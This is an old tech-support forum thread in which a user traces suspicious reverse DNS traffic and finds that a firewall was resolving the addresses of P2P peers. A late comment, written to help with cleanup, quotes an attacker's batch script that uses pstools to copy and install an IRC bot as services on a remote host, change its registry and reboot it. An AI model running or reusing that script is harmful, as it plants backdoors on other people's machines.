?
Solved

Suspicious DNS activity

Posted on 2003-03-27
20
Medium Priority
?
13,419 Views
Last Modified: 2013-11-16
Hello,

I'm running Win XP Pro on a IBM Thinkpad T30. Recently, my laptop started performing internet accesses even though there should be none. When I reboot my system (to start afresh), my Zonealarm shows continuous internet accesses from scvhost.exe (Generic Host Process under win32). I fired up Ethereal and found tons of reverse DNS requests to wierd addresses such as pc-62-30-198-107-sm.blueyonder.co.uk, p50915B1A.dip.t-dialin.net, adsl-213-190-42-6.takas.lt, 213-97-171-45.uc.nombres.ttd.es, some to surfer.at, some to wanadoo.fr, etc.etc.

I've tried running fport from foundstone, but it always returns an empty table/list.

Any ideas what is going on? and how to fix it?

Thanks!
0
Comment
Question by:Selcon
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 11
  • 2
  • 2
  • +4
20 Comments
 
LVL 18

Expert Comment

by:liddler
ID: 8218236
First guess would be some spyware or virus.  Download and run the excellent and free ad-aware (http://www.lavasoftusa.com/. To check for spyware, and run your AV software with the latest definitions.
 
0
 

Author Comment

by:Selcon
ID: 8218272
I also did ran ad-aware (with latest refupdate) as well as Norton Antivirus scan (with latest db) but both turned up nothing
0
 

Expert Comment

by:JacksonGalloway
ID: 8218287
What is running when you show the tasklist? Also, did you try running msconfig, and checking the startup tab, and turning off programs from starting up.
Thanks,
Jackson
0
Optimize your web performance

What's in the eBook?
- Full list of reasons for poor performance
- Ultimate measures to speed things up
- Primary web monitoring types
- KPIs you should be monitoring in order to increase your ROI

 

Author Comment

by:Selcon
ID: 8218349
Yes I recently went through the startup programs in the registry and msconfig/startup tab.

Here's a dump from running tasklist (initial dump to check formatting)
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
0
 

Author Comment

by:Selcon
ID: 8218362
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
csrss.exe                    688 Console                 0      3,036 K
winlogon.exe                 712 Console                 0        576 K
services.exe                 756 Console                 0      1,068 K
lsass.exe                    768 Console                 0      1,284 K
ibmpmsvc.exe                 956 Console                 0        160 K
svchost.exe                 1004 Console                 0      1,224 K
svchost.exe                 1112 Console                 0      7,404 K
svchost.exe                 1364 Console                 0      1,404 K
svchost.exe                 1448 Console                 0        764 K
spoolsv.exe                 1592 Console                 0        792 K
CDAC11BA.EXE                1772 Console                 0        224 K
defwatch.exe                1800 Console                 0        264 K
Runservice.exe              1824 Console                 0        264 K
rtvscan.exe                 1840 Console                 0      2,924 K
QCONSVC.EXE                 1864 Console                 0        264 K
svchost.exe                 1916 Console                 0      1,196 K
vsmon.exe                   1932 Console                 0      3,656 K
explorer.exe                 868 Console                 0     28,048 K
MSGSYS.EXE                  1300 Console                 0        208 K
SynTPLpr.exe                 276 Console                 0        452 K
SynTPEnh.exe                 360 Console                 0        864 K
rundll32.exe                 468 Console                 0        712 K
TPHKMGR.exe                  536 Console                 0        836 K
IMWEBSTA.exe                 668 Console                 0      1,008 K
NDetect.exe                  732 Console                 0      1,052 K
vptray.exe                  1092 Console                 0        868 K
dpps2.exe                   1492 Console                 0      1,140 K
evntsvc.exe                 1548 Console                 0        120 K
ctfmon.exe                  1560 Console                 0      1,940 K
kstatus.exe                 1028 Console                 0      1,532 K
zonealarm.exe                216 Console                 0      3,196 K
iexplore.exe                4004 Console                 0     19,200 K
iexplore.exe                2100 Console                 0     17,228 K
cmd.exe                     3224 Console                 0      1,628 K
tasklist.exe                 660 Console                 0      4,336 K
wmiprvse.exe                3616 Console                 0      5,012 K
0
 
LVL 2

Expert Comment

by:Jason_Deckard
ID: 8219736
I'm curious to see the results of "netstat -na" after a clean boot, to see who (if anyone) your computer is talking to.


Cheers,
Jason
0
 
LVL 1

Expert Comment

by:newyhouse
ID: 8220912
At the time you checked your process list, did you have a command shell open?  I see cmd.exe in there, but did YOU open it?  Hackers often "shovel" shells to themselves using tools like netcat bound to cmd.exe (so they have total control over your computer remotely).  If you didn't launch cmd.exe, this would seem likely.  In that case, Jason Deckard is right, run netstat and see what ports are listening. It sounds fishy to me...

Also, some of the mystery addresses appear to be dial-in addresses which would suggest that the activity isn't advertisement related.  
0
 
LVL 24

Expert Comment

by:SunBow
ID: 8221365
yeah, thank the lord for the monitoring/closings of a ZA product.

blueyonder: http://www.bygames.com/
What is CDAC11BA.EXE? It looks similar to one of their code acronymns. And, why... are you running so many explorers and dos programs at plain simple startup?

Did you install a game and enable networking, phone access, and register via dialup?
0
 

Accepted Solution

by:
JacksonGalloway earned 1000 total points
ID: 8221747
The CDAC11BA.EXE process is something to do with turbo tax, I think, that was after a 2 minute search on yahoo.

The defwatch.exe process is something to do with norton antivirus.

The runservice.exe is used to launch programs as service on the Windows NT/2000, it is provided by microsoft.

The rtvscan.exe process is somethign to do with norton antivirus.

From what i could gather, qconsvc is something to do with ibm software.

vsmon is part of a zonealarm personal firewall software package.

msgsys.exe is part of norton/intel for sometype of network card.

SynTPLpr.exe is a touchpad controler of some sort.

SynTPEnh.exe is also a touchpad controller of some kind.

TPHKMGR.exe is part of the thinkpad software package

IMWEBSTA.exe is for wireless lan on the thinkpad

ndetect is part of the icq software used to detect an internet connection.

vptray.exe is part of the norton suite that checks email for viruses.

dpps2.exe is part of the panicware popup killer software package.

evntsvc.exe is part of the real networks player.

ctfmon.exe is part of the office suite to interpret text to speech.

kstatus.exe has something to do with kerberos for windows

zonealarm.exe is a fire wall, i think.

wmiprvse.exe is some sort of quick shared win 98/me network access.

SO, use msconfig, turn everything off at startup, and then re-run the taskmanger and see what you got.
thanks,
jackson
0
 

Author Comment

by:Selcon
ID: 8222226
to newyhouse: yes, i opened the command window to run the tasklist command

to sunbow: two IE windows were opened at that time, one to the experts-exchange website and another to google. Nope, didnt install any games recently.

to jackson:
Here is a dump of netstat -an currently without turning everything off (which i hate to do :). The suspicious DNS requests are still continuing right now when I am dumping the netstat -an results.

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:1086           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1790         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*
0
 

Author Comment

by:Selcon
ID: 8222238
192.168.0.69 is my internal IP address of my laptop by the way, i'm running my home network through a software NAT with a DSL provider (single ip). The gateway (just running the software NAT) is 192.168.0.1
0
 

Author Comment

by:Selcon
ID: 8222363
Ok, I removed everything under the startup tab in msconfig, except for zonealarm and norton antivirus. Havent removed the services yet, but this is what i get. The reverse DNS activity is still continuing, and here's a dump of netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*

and here's a dump of tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0        224 K
smss.exe                     628 Console                 0        344 K
csrss.exe                    684 Console                 0      3,976 K
winlogon.exe                 708 Console                 0      2,340 K
services.exe                 752 Console                 0      2,916 K
lsass.exe                    764 Console                 0      5,296 K
ibmpmsvc.exe                 948 Console                 0      1,160 K
svchost.exe                  992 Console                 0      2,796 K
svchost.exe                 1100 Console                 0     19,820 K
svchost.exe                 1360 Console                 0      1,972 K
svchost.exe                 1372 Console                 0      3,376 K
spoolsv.exe                 1636 Console                 0      6,056 K
defwatch.exe                1820 Console                 0      1,384 K
Runservice.exe              1844 Console                 0      1,424 K
rtvscan.exe                 1904 Console                 0     10,488 K
QCONSVC.EXE                 1944 Console                 0      1,420 K
svchost.exe                 1972 Console                 0      2,676 K
vsmon.exe                   1992 Console                 0      5,532 K
MSGSYS.EXE                   552 Console                 0      2,100 K
explorer.exe                1084 Console                 0     24,084 K
vptray.exe                  2044 Console                 0      6,048 K
msconfig.exe                1756 Console                 0      5,040 K
kstatus.exe                  584 Console                 0      2,828 K
zonealarm.exe               1136 Console                 0      7,316 K
cmd.exe                     1656 Console                 0      1,572 K
tasklist.exe                1488 Console                 0      3,912 K
wmiprvse.exe                1164 Console                 0      5,032 K

0
 

Author Comment

by:Selcon
ID: 8222601
Alright, I have stopped all services except for

DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services

The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.

This is the current netstat -an output

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    127.0.0.1:1067         *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*

and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)

System Idle Process            0                         0         20 K
System                         4                         0        128 K
smss.exe                     628                         0        232 K
csrss.exe                    684                         0      2,860 K
winlogon.exe                 708                         0      2,596 K
services.exe                 752                         0      2,648 K
lsass.exe                    764                         0      1,268 K
ibmpmsvc.exe                 948                         0        712 K
svchost.exe                  992                         0      2,348 K
svchost.exe                 1100                         0     13,648 K
svchost.exe                 1360                         0      1,708 K
QCONSVC.EXE                 1944                         0        948 K
vsmon.exe                   1992                         0      4,852 K
explorer.exe                1084                         0     25,376 K
zonealarm.exe               1136                         0      2,876 K
mmc.exe                     1076                         0     13,612 K
svchost.exe                  212                         0      2,712 K
wmiprvse.exe                1088                         0      4,300 K

0
 

Author Comment

by:Selcon
ID: 8222662
Alright, I have stopped all services except for

DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services

The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.

This is the current netstat -an output

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    127.0.0.1:1067         *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*

and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)

System Idle Process            0                         0         20 K
System                         4                         0        128 K
smss.exe                     628                         0        232 K
csrss.exe                    684                         0      2,860 K
winlogon.exe                 708                         0      2,596 K
services.exe                 752                         0      2,648 K
lsass.exe                    764                         0      1,268 K
ibmpmsvc.exe                 948                         0        712 K
svchost.exe                  992                         0      2,348 K
svchost.exe                 1100                         0     13,648 K
svchost.exe                 1360                         0      1,708 K
QCONSVC.EXE                 1944                         0        948 K
vsmon.exe                   1992                         0      4,852 K
explorer.exe                1084                         0     25,376 K
zonealarm.exe               1136                         0      2,876 K
mmc.exe                     1076                         0     13,612 K
svchost.exe                  212                         0      2,712 K
wmiprvse.exe                1088                         0      4,300 K

0
 

Author Comment

by:Selcon
ID: 8222693
the troublesome thing is that every application on the system makes DNS requests through svchost.exe, and I have no idea how to make svchost report which application is making those requests or who it is returning the results to.

from the looks of the processes left in the tasklist (is there some way a process can hide from tasklist display?), it seems that i have a trojaned program
0
 

Author Comment

by:Selcon
ID: 8222943
ok, i've found the source of the problem
ZoneAlarm was the one that's making the reverse DNS requests. It was blocking lots of packets directed to my laptop and resolving the source ips to display the hostname in the alert logs

and the reason i was getting so many packets was because I used to run eMule (a p2p program) and apparantly eMule clients cache lists of ips that have the file they want and they just keep probing to see if the client is alive.

Thanks for all the help pple!
(should i just award the points to whoever did the most work?)
0
 
LVL 2

Expert Comment

by:Jason_Deckard
ID: 8224178
Selcon,

It seems *you* did most of the work :)

If you're taking suggestions, I think JacksonGalloway is most deserving of your points.
0
 
LVL 24

Expert Comment

by:SunBow
ID: 8225755
I'd sure like to know where we can get a handy list of those services myself, especially for the prime tow mfr's (MS, IBM). ZoneAlarm is at least readable, it's the real name of the product.
0
 

Author Comment

by:Selcon
ID: 8229625
Yup.
It is actually interesting because since all apps does DNS through svchost, which makes it very hard to track down the culprit, esp if it could use DNS requests/replies to hide information, maybe with a special DNS server.

0
 

Expert Comment

by:callen2003
ID: 8662401
okkk.. SCVHOST is NOT a Microsoft installed service. SVCHOST is. SCVHOST will look like a Green U when pulled up in a search window. To remove this its a very long and hard process. Its a IRC bot dropped in on your local system and forcing a FTP server to be run. It is accompanied by many if not 10 or 20 other files which can be thrown in multiple places. Most places could be the following from what i have seen

C:\Winnt\System32\Drivers\etc\
c:\Winnt\Repair\
C:\Winnt\System\dump\   or Temp\
And others. You can locate it by just searching for the file SCVHOST. but do not delete until you goto that directory and find a batch file (*.BAT) in the directory. It will probably have a file called Profile or IrOffer. If you find a BAT file in the directory and open it with notepad. You will probably see something like the following.

mkdir \\%1\azkc\winnt\repair\iro
mkdir \\%1\azkc\winnt\repair\iro\ul
copy C:\iro \\%1\azkc\winnt\repair\iro
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log "log" "c:\winnt\repair\iro\syslog.exe c:\winnt\repair\iro\sample.config" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log2 "log2" "c:\winnt\repair\iro\sysbk.exe c:\winnt\repair\iro\sysbk.ini" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\lanmanserver\start=3
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\browser\start=3
C:\pstools\psshutdown -t 2 -r \\%1
If No Critical Errors Then %1 is ROOTED...


If this is found then you have been "Rooted" by some IRC junkie who is trying to serve files. You will see about 10 files like the following:

cygwin1.dll
netlog.exe
pkzip.exe
reg.exe
sample.config
ssleay32.dll
sysbk.exe
tzolibr.dll


Some of the files can be renamed and will be by the attacker who planted them. But the .Config is a definite since IrOffer needs that as its extension.

If anyone needs any help just throw me an email back and i will be glad to walk anyone through the process in removing these.


Thanks,
Chris Allen
aka ScriptJunkie







0

Featured Post

Cyber Threats to Small Businesses (Part 1)

This past May, Webroot surveyed more than 600 IT decision-makers at medium-sized companies to see how these small businesses perceived new threats facing their organizations.  Read what Webroot CISO, Gary Hayslip, has to say about the survey in part 1 of this 2-part blog series.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Ever wonder what it's like to get hit by ransomware? "Tom" gives you all the dirty details first-hand – and conveys the hard lessons his company learned in the aftermath.
Hey fellow admins! This time, I have a little fairy tale for you. As many tales do, it starts boring and then gets pretty gory. I hope you like it. TL;DR: It is about an important security matter, you should read it if you run or administer Windows …
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…
This video Micro Tutorial shows how to password-protect PDF files with free software. Many software products can do this, such as Adobe Acrobat (but not Adobe Reader), Nuance PaperPort, and Nuance Power PDF, but they are not free products. This vide…
Suggested Courses

771 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question